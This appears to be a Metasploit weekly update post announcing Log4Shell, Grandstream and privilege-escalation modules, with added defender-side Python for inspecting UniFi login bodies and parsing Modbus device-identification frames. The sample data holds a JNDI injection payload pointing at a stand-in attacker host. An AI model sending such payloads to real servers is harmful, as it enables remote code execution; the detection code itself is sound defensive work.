Last updated at Fri, 28 Jan 2022 20:00:53 GMT
I'm sure you know what's coming, more Log4Shell
For those wondering when the Log4Shell remediation nightmare will end, I'm afraid I can't give you that. What I can give you, though, is a new Log4Shell module! With the new module from zeroSteiner you can expect to get unauthenticated RCE on the Ubiquiti UniFi Controller Application via a POST request to the /api/login page. Be sure to leverage the module's check function since scanners detecting header injection may not work.
A new getsystem technique for Meterpreter
smashery has done an amazing job working on giving us a fifth getsystem technique on the Windows Meterpreter. This newest addition ports Clément Labro's PrintSpoofer technique to Metasploit. It gains SYSTEM privileges from the LOCAL SERVICE and NETWORK SERVICE accounts by abusing the SeImpersonatePrivilege privilege. Like the other getsystem techniques, this attack takes place entirely in memory without any additional configuration on both 32-bit and 64-bit versions of Windows. It has been tested successfully on Windows 8.1 / Server 2016 and later. Unlike some of the other getsystem techniques, this one also has the advantage of not starting services, which is often an action that is identified as malicious. Users can run this elevation technique directly by using the getsystem -t 5 command in Meterpreter. Now exploits that yield sessions with LOCAL SERVICE and NETWORK SERVICE permissions can easily be upgraded to full SYSTEM level privileges.
New module content (2)
- Grandstream UCM62xx IP PBX sendPasswordEmail RCE by jbaines-r7, which exploits CVE-2020-5722 - A new exploit module for CVE-2020-5722 has been added which exploits an unauthenticated SQL injection vulnerability and a command injection vulnerability affecting the Grandstream UCM62xx IP PBX series of devices to go from an unauthenticated remote user to root-level code execution.
- UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell) by Nicholas Anastasi, RageLtMan, and Spencer McIntyre, which exploits CVE-2021-44228 - A module has been added to exploit CVE-2021-44228, an unauthenticated RCE in the Ubiquiti UniFi controller application versions 5.13.29 through 6.5.53 in the remember field of a POST request to the /api/login page. Successful exploitation results in OS command execution in the context of the server application.
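Because the UniFi module above injects through the remember field of the JSON login body rather than a request header, a signature written for header injection can miss it. The inspector below is an added defender-side example, not code from Metasploit or from this post: it treats the login body as data with a schema, flags any non-boolean remember value as reportable, and marks values carrying Log4j lookup syntax as suspicious. The request bodies, usernames, passwords and the host name attacker.example are all constructed placeholders.

```python
import json
import re

# Constructed sample /api/login POST bodies (not captured traffic); the host
# name attacker.example is a placeholder, not a real indicator.
SAMPLE_REQUESTS = [
    '{"username":"admin","password":"hunter2","remember":true}',
    '{"username":"admin","password":"hunter2","remember":false}',
    '{"username":"admin","password":"hunter2",'
    '"remember":"${jndi:ldap://attacker.example/a}"}',
    '{"username":"admin","password":"hunter2","remember":"yes"}',
    'username=admin&password=hunter2',
]

# Every Log4j lookup, nested or not, opens with "${", so the opening token is
# enough to raise the flag; the schema check below does not depend on it.
LOOKUP_RE = re.compile(r"\$\{")


def inspect_login_body(body: str) -> dict:
    """Classify one /api/login request body.

    Returns a dict whose 'verdict' is ok, anomalous, suspicious or malformed.
    The schema check comes first: a legitimate client only ever sends a JSON
    boolean in 'remember', so any other type is reportable on its own.
    """
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return {"verdict": "malformed", "reason": "body is not JSON"}
    if not isinstance(data, dict):
        return {"verdict": "malformed", "reason": "body is not a JSON object"}

    remember = data.get("remember")
    # bool is tested before anything else: in Python, True is also an int.
    if remember is None or isinstance(remember, bool):
        return {"verdict": "ok", "reason": "remember is absent or boolean"}

    text = remember if isinstance(remember, str) else json.dumps(remember)
    if LOOKUP_RE.search(text) or "jndi" in text.lower():
        return {
            "verdict": "suspicious",
            "reason": "lookup syntax in remember field",
            "value": text,
        }
    return {
        "verdict": "anomalous",
        "reason": "remember is not a boolean",
        "value": text,
    }


def scan_requests(bodies) -> list:
    """Run the inspector over a batch of bodies and keep the reportable ones."""
    findings = []
    for index, body in enumerate(bodies):
        result = inspect_login_body(body)
        if result["verdict"] != "ok":
            result["index"] = index
            findings.append(result)
    return findings


if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_REQUESTS):
        print(f"request {finding['index']}: {finding['verdict']} "
              f"({finding['reason']})")
```

The schema check is the part worth keeping: it fires on an off-type value whether or not the payload uses the literal `${jndi:` string, which is what makes it more robust than a header regex for this particular endpoint.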
Enhancements and features
- #15904 from smashery - This PR adds the logic to support a fifth getsystem option using SeImpersonatePrivilege to gain SYSTEM privileges using the Print Spooler primitive on Windows. It is the Framework side of https://github.com/rapid7/metasploit-payloads/pull/509.
- #16020 from VanSnitza - The exploit/scanner/auxiliary/scada/modbusclient module has been enhanced to support command 0x2B, which gives clear text info about a device. Additionally, the module's code has been updated to comply with RuboCop standards.
- #16090 from audibleblink - A new method user_data_directory has been added to lib/msf/base/config.rb to allow users that use private Metasploit modules to keep module resources organized in the same way that MSF does for core modules, all whilst keeping their ~/.msf4 directory portable between installs.
- #16096 from zeroSteiner - The implementation of the ListenerComm datastore options has now been updated to support specifying -1 to refer to the most recently created session without having to either remember what it was or change it when a new session is created.
- #16106 from bwatters-r7 - This PR updates the stdapi_fs_delete_dir command to recursively delete the directory. Previously, we discovered some inconsistencies in the handling of directory deletion across Meterpreter payloads, and this implements a fix in the Linux Meterpreter to support recursive deletion of directories, even if they contain files, matching implementations in other Meterpreter types.
- #16054 from namaenonaimumei - This PR updates John the Ripper (JTR) compatibility by altering the flag used to prevent logging.
- #16104 from zeroSteiner - Fixes a crash in the portfwd command which occurred when pivoting a reverse_http Python Meterpreter through a reverse_tcp Windows Meterpreter
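The modbusclient enhancement above (#16020) adds support for command 0x2B, which is the Modbus Encapsulated Interface Transport function code; with MEI type 0x0E it is the Read Device Identification query that returns vendor, product and revision strings in clear text. The code below is an added example written for this post, not code from Metasploit or from the PR: it builds that request, decodes the response objects following the Modbus application protocol encoding, and tags frames so a network monitor can log identification queries against PLCs from hosts that have no business asking. The device name, product code and revision in the sample response are constructed.

```python
import struct

FUNC_ENCAPSULATED_INTERFACE = 0x2B  # Modbus function code 43
MEI_READ_DEVICE_ID = 0x0E           # MEI type 14: Read Device Identification
MODBUS_TCP_PROTOCOL_ID = 0

# Standard object ids of the Basic and Regular identification categories.
OBJECT_NAMES = {
    0x00: "VendorName", 0x01: "ProductCode", 0x02: "MajorMinorRevision",
    0x03: "VendorUrl", 0x04: "ProductName", 0x05: "ModelName",
    0x06: "UserApplicationName",
}


def build_read_device_id_request(transaction_id=1, unit_id=1,
                                 read_code=0x01, object_id=0x00) -> bytes:
    """Build a Modbus/TCP frame for Read Device Identification (0x2B / 0x0E).

    read_code 0x01 asks for the Basic objects (0x00-0x02); object_id is the
    first object the device should return.
    """
    pdu = bytes([FUNC_ENCAPSULATED_INTERFACE, MEI_READ_DEVICE_ID,
                 read_code, object_id])
    # MBAP header: transaction id, protocol id, length (unit id + PDU), unit id.
    mbap = struct.pack(">HHHB", transaction_id, MODBUS_TCP_PROTOCOL_ID,
                       len(pdu) + 1, unit_id)
    return mbap + pdu


def _split_frame(frame: bytes):
    """Validate the MBAP header and return (transaction_id, unit_id, pdu)."""
    if len(frame) < 7:
        raise ValueError("frame shorter than MBAP header")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != MODBUS_TCP_PROTOCOL_ID:
        raise ValueError("protocol id is not 0; not Modbus/TCP")
    pdu = frame[7:7 + length - 1]
    if len(pdu) != length - 1 or len(pdu) < 1:
        raise ValueError("PDU length does not match MBAP length field")
    return tid, unit, pdu


def classify_frame(frame: bytes) -> str:
    """Tag a frame so a monitor can log identification queries seen on the wire."""
    try:
        _, _, pdu = _split_frame(frame)
    except ValueError:
        return "invalid"
    if (len(pdu) >= 2 and pdu[0] == FUNC_ENCAPSULATED_INTERFACE
            and pdu[1] == MEI_READ_DEVICE_ID):
        # A request PDU is exactly 4 bytes; anything longer is a response.
        return "read_device_id_request" if len(pdu) == 4 else "read_device_id_response"
    if pdu[0] == FUNC_ENCAPSULATED_INTERFACE | 0x80:
        return "exception_response"
    return "other"


def parse_read_device_id_response(frame: bytes) -> dict:
    """Decode the identification objects in a Read Device Identification response."""
    tid, unit, pdu = _split_frame(frame)
    if pdu[0] == FUNC_ENCAPSULATED_INTERFACE | 0x80:
        # Exception: function code with the high bit set, then the exception code.
        return {"transaction_id": tid, "unit_id": unit,
                "exception_code": pdu[1] if len(pdu) > 1 else None}
    if (len(pdu) < 7 or pdu[0] != FUNC_ENCAPSULATED_INTERFACE
            or pdu[1] != MEI_READ_DEVICE_ID):
        raise ValueError("not a complete Read Device Identification response")
    read_code, conformity, more_follows, next_object, count = pdu[2:7]
    objects, pos = {}, 7
    for _ in range(count):
        if pos + 2 > len(pdu):
            raise ValueError("truncated object header")
        obj_id, obj_len = pdu[pos], pdu[pos + 1]
        value = pdu[pos + 2:pos + 2 + obj_len]
        if len(value) != obj_len:
            raise ValueError("truncated object value")
        name = OBJECT_NAMES.get(obj_id, f"object_{obj_id:#04x}")
        objects[name] = value.decode("ascii", errors="replace")
        pos += 2 + obj_len
    return {"transaction_id": tid, "unit_id": unit, "read_code": read_code,
            "conformity_level": conformity, "more_follows": bool(more_follows),
            "next_object_id": next_object, "objects": objects}


def build_sample_response(transaction_id=1, unit_id=1) -> bytes:
    """Constructed response from a fictional device, for offline testing only."""
    objs = [(0x00, b"ExampleVendor"), (0x01, b"PLC-1000"), (0x02, b"2.1")]
    body = b"".join(bytes([oid, len(val)]) + val for oid, val in objs)
    pdu = bytes([FUNC_ENCAPSULATED_INTERFACE, MEI_READ_DEVICE_ID,
                 0x01, 0x01, 0x00, 0x00, len(objs)]) + body
    return struct.pack(">HHHB", transaction_id, MODBUS_TCP_PROTOCOL_ID,
                       len(pdu) + 1, unit_id) + pdu


if __name__ == "__main__":
    frame = build_sample_response()
    print(classify_frame(frame), parse_read_device_id_response(frame)["objects"])
```

The length checks matter more than they look: a device identification response is variable-length and self-describing, so a parser that trusts the object count or object lengths without bounds checks is the kind of code that falls over on a malformed frame from a misbehaving PLC.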
As always, you can update to the latest Metasploit Framework with
and you can get more details on the changes since the last blog post from
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).